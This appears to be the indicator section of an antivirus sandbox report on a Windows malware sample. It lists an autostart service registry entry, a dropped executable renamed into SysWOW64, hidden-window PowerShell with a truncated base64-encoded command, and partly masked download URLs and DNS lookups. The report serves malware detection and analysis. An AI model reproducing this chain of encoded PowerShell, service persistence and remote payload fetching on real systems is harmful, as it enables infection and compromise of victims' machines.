Technical Information
- [<HKLM>\System\CurrentControlSet\Services\idebugidebug] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\idebugidebug] 'ImagePath' = '"%WINDIR%\SysWOW64\idebugidebug.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABIAHQAZgB5AG4AZwBjAHYAZQBrAHoAaQA9ACcAQwB6AGMAeABrAG4AZwB1AGEAdAByAGsAZgAnADsAJABZAGQAcQBjAHAAbABiAGgAegBlAHMAdgAgAD0AIAAnADQAOAA3ACcAOwAkAFAAegBxAG0AdgBpAHQAZQBtAD0AJwBEAHoAZgBkAGgAZQB...
- %HOMEPATH%\487.exe
- from %HOMEPATH%\487.exe to %WINDIR%\syswow64\idebugidebug.exe
- http://ke###hub.com/wp-content/d0lk27/
- http://18#.#31.62.54/guids/window/ringin/
- DNS ASK na####onsulting.com
- DNS ASK ke###hub.com
- '%HOMEPATH%\487.exe'
- '%WINDIR%\syswow64\idebugidebug.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABIAHQAZgB5AG4AZwBjAHYAZQBrAHoAaQA9ACcAQwB6AGMAeABrAG4AZwB1AGEAdAByAGsAZgAnADsAJABZAGQAcQBjAHAAbABiAGgAegBlAHMAdgAgAD0AIAAnADQAOAA3ACcAOwAkAFAAegBxAG0AdgBpAHQAZQBtAD0AJwBEAHoAZgBkAGgAZQB...' (with hidden window)